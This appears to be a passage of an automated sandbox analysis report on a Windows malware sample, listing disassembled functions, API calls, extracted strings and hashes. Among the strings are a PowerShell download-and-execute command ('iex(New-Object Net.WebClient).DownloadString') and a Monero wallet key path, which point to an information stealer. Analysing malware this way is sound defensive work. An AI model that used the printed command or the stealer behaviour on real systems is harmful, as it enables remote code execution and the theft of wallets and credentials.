                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: 98d6726c408a583ea425bb905b240fc89791585d775d11bfa96bcf728019922a
                                    • Instruction ID: 4237b3bcbb2dde81ed98244de9fa2fe89684e6cc0aefac42e7ffb4c64e0123b2
                                    • Opcode Fuzzy Hash: 98d6726c408a583ea425bb905b240fc89791585d775d11bfa96bcf728019922a
                                    • Instruction Fuzzy Hash: 280144B5A40308BFE714DBE1DC4AFAEB7B8EB44701F144565FA09A7281D67056448B52
                                    Function 00C440B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 00C440D5
                                    • RegOpenKeyExA.ADVAPI32(80000001,019DD1D8,00000000,00020119,?), ref: 00C440F4
                                    • RegQueryValueExA.ADVAPI32(?,019DDAC0,00000000,00000000,00000000,000000FF), ref: 00C44118
                                    • RegCloseKey.ADVAPI32(?), ref: 00C44122
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C44147
                                    • lstrcat.KERNEL32(?,019DD880), ref: 00C4415B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValuememset
                                    • String ID:
                                    • API String ID: 2623679115-0
                                    • Opcode ID: 3ecbaffbe4551e526c473717ac0dd4d14a06eda0be06cbdc5262610a81280502
                                    • Instruction ID: fe2b4e4b4737d46f42a50610ca16fe18ca494ac8b76d27fe4613d7a4ae8fd9c5
                                    • Opcode Fuzzy Hash: 3ecbaffbe4551e526c473717ac0dd4d14a06eda0be06cbdc5262610a81280502
                                    • Instruction Fuzzy Hash: D24165B6910108AFDB14FBA0DC46FFE737DBBC8300F444558BA1A96181EA755B8C9B92
                                    Function 00C399C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                    • ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                    • LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                    • CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: 335eee0acaed992b23f2afe4dac044ea7638a4e986624f3153d02d6b741a13b4
                                    • Instruction ID: 0863342ab00790bbe079c8ef6947ff40a457b4fbdd3ded9186e4bdda3083aca4
                                    • Opcode Fuzzy Hash: 335eee0acaed992b23f2afe4dac044ea7638a4e986624f3153d02d6b741a13b4
                                    • Instruction Fuzzy Hash: 3E316D74A00209EFDB14DF95D885BAE77B5FF88300F108258E915A7290C774AA85DFA1
                                    Function 00C4C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Typememset
                                    • String ID:
                                    • API String ID: 3530896902-3916222277
                                    • Opcode ID: f4b14b8070fe2d57f0b4654b81b73ff77d1eb59f7658a1e746dd5f4a893d2c3b
                                    • Instruction ID: 47b6fe5c9c841a37abd221e008066225d2dd9aaef4bc4fbef377b1db920e9f59
                                    • Opcode Fuzzy Hash: f4b14b8070fe2d57f0b4654b81b73ff77d1eb59f7658a1e746dd5f4a893d2c3b
                                    • Instruction Fuzzy Hash: 924126B150179CAEDB218B24CCC4FFBBBE8BF15304F1444E8E99A86192E2719B45DF20
                                    Function 00C44780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcat.KERNEL32(?,019DD988), ref: 00C447DB
                                      • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C44801
                                    • lstrcat.KERNEL32(?,?), ref: 00C44820
                                    • lstrcat.KERNEL32(?,?), ref: 00C44834
                                    • lstrcat.KERNEL32(?,019CB270), ref: 00C44847
                                    • lstrcat.KERNEL32(?,?), ref: 00C4485B
                                    • lstrcat.KERNEL32(?,019DD078), ref: 00C4486F
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C48D90: GetFileAttributesA.KERNEL32(00000000,?,00C31B54,?,?,00C5564C,?,?,00C50E1F), ref: 00C48D9F
                                      • Part of subcall function 00C44570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C44580
                                      • Part of subcall function 00C44570: RtlAllocateHeap.NTDLL(00000000), ref: 00C44587
                                      • Part of subcall function 00C44570: wsprintfA.USER32 ref: 00C445A6
                                      • Part of subcall function 00C44570: FindFirstFileA.KERNEL32(?,?), ref: 00C445BD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: c0bb86bb43a9afb980b20b292558d8e938d732ee7c711599f681a8297713ed11
                                    • Instruction ID: 3f49a63a5bbfa89121954b00da500d256c592ecf47b88042986d5367745f69d9
                                    • Opcode Fuzzy Hash: c0bb86bb43a9afb980b20b292558d8e938d732ee7c711599f681a8297713ed11
                                    • Instruction Fuzzy Hash: 003171B29002086BDB14FBB0DC86EED737CBB58700F444599B319A6081EE7497CDDB92
                                    Function 00C42C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C42D85
                                    Strings
                                    • <, xrefs: 00C42D39
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00C42D04
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00C42CC4
                                    • ')", xrefs: 00C42CB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 1627c5fa34456e7e1bc6e31d97e8366d35d1fc20d408622ad43b0ac45bd59360
                                    • Instruction ID: c04cc2160377460386b987b843223b78a56b9f87be3c614019101501125faada
                                    • Opcode Fuzzy Hash: 1627c5fa34456e7e1bc6e31d97e8366d35d1fc20d408622ad43b0ac45bd59360
                                    • Instruction Fuzzy Hash: B841DD71C502089AEB14FFA1C892BEDBB74FF14304F504129F416A61D2DF746A8AEF95
                                    Function 00C39E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00C39F41
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$AllocLocal
                                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                    • API String ID: 4171519190-1096346117
                                    • Opcode ID: 2548ce65c7fada2758d301de7fbcd5543fd493f1212526cdfd6f57df692b2145
                                    • Instruction ID: 0175bd1c0d710998d05489da103ab0a46acd7d871033124fda56a67150471746
                                    • Opcode Fuzzy Hash: 2548ce65c7fada2758d301de7fbcd5543fd493f1212526cdfd6f57df692b2145
                                    • Instruction Fuzzy Hash: 67615E75A50208AFDB28EFA4CC96FED7775BF44304F048018F90A9B191EB746A46DB52
                                    Function 00C46920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 00C4696C
                                    • sscanf.NTDLL ref: 00C46999
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C469B2
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C469C0
                                    • ExitProcess.KERNEL32 ref: 00C469DA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: 03a5d5951847db2f18000d8578f1f804dccc2f651e29417838c0f2ac6fdc649f
                                    • Instruction ID: bbdb9b450b98a056d6c840cc88b7d4dc4e9053ac0e906248e22c998ff1303f63
                                    • Opcode Fuzzy Hash: 03a5d5951847db2f18000d8578f1f804dccc2f651e29417838c0f2ac6fdc649f
                                    • Instruction Fuzzy Hash: 7021EA75D04208AFDF08EFE4E9499EEB7B5BF48300F04852AE41AB3250EB345609CB66
                                    Function 00C47E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47E37
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C47E3E
                                    • RegOpenKeyExA.ADVAPI32(80000002,019CB8F8,00000000,00020119,?), ref: 00C47E5E
                                    • RegQueryValueExA.ADVAPI32(?,019DD278,00000000,00000000,000000FF,000000FF), ref: 00C47E7F
                                    • RegCloseKey.ADVAPI32(?), ref: 00C47E92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 2408f0725655bf02c29892ffddbea53502a67b5de796209c8c4a5bbb4a8cada5
                                    • Instruction ID: 074f3c998993c1ee3f773f4b9f474fcc115dd2070a7941626f9b3756b8b8773b
                                    • Opcode Fuzzy Hash: 2408f0725655bf02c29892ffddbea53502a67b5de796209c8c4a5bbb4a8cada5
                                    • Instruction Fuzzy Hash: 12119EB1A44205EFD714CF96DC49FBFBBB8FB44B11F104269FA19A7280D77458448BA2
                                    Function 00C49260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • StrStrA.SHLWAPI(019DDA60,?,?,?,00C4140C,?,019DDA60,00000000), ref: 00C4926C
                                    • lstrcpyn.KERNEL32(00E7AB88,019DDA60,019DDA60,?,00C4140C,?,019DDA60), ref: 00C49290
                                    • lstrlen.KERNEL32(?,?,00C4140C,?,019DDA60), ref: 00C492A7
                                    • wsprintfA.USER32 ref: 00C492C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: 65f9723c1dfb9f69dffc7af861c15161e24a4550ec677cd9733b19d9f5f3e885
                                    • Instruction ID: 28876ff8b42362dc6559dcc23428857f4689c530d048d04c378d6f7cb0d45bdf
                                    • Opcode Fuzzy Hash: 65f9723c1dfb9f69dffc7af861c15161e24a4550ec677cd9733b19d9f5f3e885
                                    • Instruction Fuzzy Hash: CA01E975500108FFCB04DFE8C989EAE7BB9EB84351F148158F909AB200C671AA84DB91
                                    Function 00C312A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C312B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C312BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C312D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C312F5
                                    • RegCloseKey.ADVAPI32(?), ref: 00C312FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
